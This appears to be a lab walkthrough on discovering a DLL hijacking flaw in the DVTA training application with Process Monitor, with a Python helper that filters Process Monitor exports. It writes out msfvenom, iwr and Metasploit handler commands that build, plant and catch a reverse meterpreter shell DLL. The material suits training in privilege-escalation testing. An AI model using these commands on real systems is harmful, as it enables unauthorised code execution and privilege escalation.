
Finding and Exploiting DLL Hijacking Vulnerabilities


Discovering DLL Hijacking Vulnerabilities Using Process Monitor

In this lab we identify and exploit a DLL Hijacking vulnerability using Process Monitor on a Windows machine. The exercise shows how a DLL that an application looks for in a directory a low-privileged user can write to becomes a path to privilege escalation.

Lab Environment

You will need access to:

  • Kali Linux GUI instance
  • Windows machine (Administrator access for application analysis and Student access for privilege escalation)

Objective

Identify a DLL Hijacking vulnerability in the DVTA application (located at C:\Users\Administrator\Desktop\dvta\bin\Release\DVTA.exe) and gain a meterpreter session with administrator privileges.

Tools Required

  • Process Monitor
  • Metasploit Framework

Lab Steps

Step 1: Accessing the Lab

Ensure you have access to both the Kali Linux instance and the Windows machine provided.

Step 2: Manual Analysis with Process Monitor

Process Monitor (Sysinternals) displays real-time file system, registry and process activity. For this lab the relevant part is that it records every file an application tries to open, including DLLs the application searches for in a directory where they do not exist.

  • Launch Process Monitor on the Windows machine (run it as Administrator; it loads a kernel driver to capture events).

Step 3: Running DVTA Application

Start the DVTA.exe application from its location:

C:\Users\Administrator\Desktop\dvta\bin\Release\DVTA.exe

Monitor the process in Process Monitor to capture all file system activities related to DVTA.exe.

Step 4: Identifying Missing DLLs

Apply a filter so that only “CreateFile” operations are shown, then look for entries from DVTA.exe whose Result is “NAME NOT FOUND” and whose Path ends in .dll. These are DLLs that DVTA.exe attempts to load from a location where they are not present.

  • Set a filter for “CreateFile”: Operation is ‘CreateFile’ → Include.

Step 5: Verifying Write Permissions

Verify that the Student user (PRIVILEGE-ESCAL\student) has full control permissions over the DVTA application directory:

Get-ACL 'C:\Users\Administrator\Desktop\dvta\bin\Release' | Format-List

This step confirms that the Student user can write a malicious DLL into the directory that DVTA.exe searches first.
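Steps 4 and 5 can also be triaged offline from a Process Monitor CSV export (File → Save, CSV format). The script below is an added example, not part of the lab; it assumes the standard export column names ("Process Name", "Operation", "Path", "Result") and runs on a constructed sample in which the DWrite.dll lookup fails in the application directory before succeeding elsewhere, which is exactly the pattern that makes the application directory a hijack location.

```python
import csv
import io

# Constructed sample of a Process Monitor CSV export, trimmed to a few rows.
# Row 1: DVTA.exe looks for DWrite.dll in its own directory and fails.
# Row 2: the loader then finds the legitimate copy under System32.
# The remaining rows are noise that the filter must ignore.
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","DVTA.exe","4242","CreateFile","C:\\Users\\Administrator\\Desktop\\dvta\\bin\\Release\\DWrite.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","DVTA.exe","4242","CreateFile","C:\\Windows\\System32\\DWrite.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.3","DVTA.exe","4242","CreateFile","C:\\Users\\Administrator\\Desktop\\dvta\\bin\\Release\\DVTA.exe.config","NAME NOT FOUND","Desired Access: Generic Read"
"10:01:02.4","DVTA.exe","4242","RegOpenKey","HKLM\\Software\\Microsoft\\.NETFramework","SUCCESS",""
"10:01:02.5","explorer.exe","1000","CreateFile","C:\\Windows\\System32\\other.dll","NAME NOT FOUND",""
"""


def find_hijack_candidates(csv_text, process_name):
    """Return {dll name (lower-case): [directories where the lookup failed]}
    for every DLL the given process tried to open and did not find.
    The loader walks the search path in order, so a failed lookup in an
    earlier directory stays a candidate even if a later lookup succeeds."""
    candidates = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        directory, _, name = row["Path"].rpartition("\\")
        if not name.lower().endswith(".dll"):
            continue
        candidates.setdefault(name.lower(), []).append(directory)
    return candidates


def in_directory(candidates, directory):
    """Keep only the DLLs whose failed lookup happened in `directory`, i.e.
    the ones worth checking with Get-Acl on that directory."""
    wanted = directory.rstrip("\\").lower()
    return {dll: dirs for dll, dirs in candidates.items()
            if any(d.lower() == wanted for d in dirs)}


if __name__ == "__main__":
    # For a real export use: open(path, encoding="utf-8-sig").read()
    found = find_hijack_candidates(SAMPLE_CSV, "DVTA.exe")
    app_dir = "C:\\Users\\Administrator\\Desktop\\dvta\\bin\\Release"
    for dll, dirs in in_directory(found, app_dir).items():
        print(f"{dll}: not found in {', '.join(dirs)} -> check ACL of that directory")
```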

Step 6: Exploiting the Vulnerability

Generate a malicious DLL using Metasploit Framework’s msfvenom, targeting a reverse TCP meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.2 LPORT=4444 -f dll > Dwrite.dll

Start an HTTP server on Kali, from the directory containing Dwrite.dll, to host the DLL (SimpleHTTPServer is the Python 2 module name; on current Kali the Python 3 equivalent is http.server):

python3 -m http.server 80

Step 7: Executing the Attack

  • Download the generated Dwrite.dll onto the Windows machine into the DVTA application directory:

iwr -UseBasicParsing -Uri http://10.10.15.2/Dwrite.dll -OutFile C:\Users\Administrator\Desktop\dvta\bin\Release\Dwrite.dll

Step 8: Initiating Meterpreter Session

Launch Metasploit multi-handler to receive the meterpreter session:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.15.2
set LPORT 4444
exploit

Step 9: Triggering the Exploit

Run the DVTA.exe application on the Windows machine. Because the application's own directory is searched before the system directories, the loader picks up the planted Dwrite.dll, and the payload runs with the privileges of the user who started DVTA.exe, returning a meterpreter session to the handler.

Conclusion

In this lab, we navigated through the process of manual analysis using Process Monitor to discover a DLL Hijacking vulnerability in DVTA.exe. By leveraging Metasploit Framework, we crafted a malicious DLL and exploited the vulnerability to gain a privileged meterpreter session. This exercise highlights the importance of understanding application behavior and security implications associated with DLL loading mechanisms.

This lab not only enhances your technical proficiency but also provides practical insights into securing applications against DLL Hijacking attacks. Stay vigilant and keep exploring new techniques to bolster your cybersecurity expertise.

Note: Blog based on publicly available information.
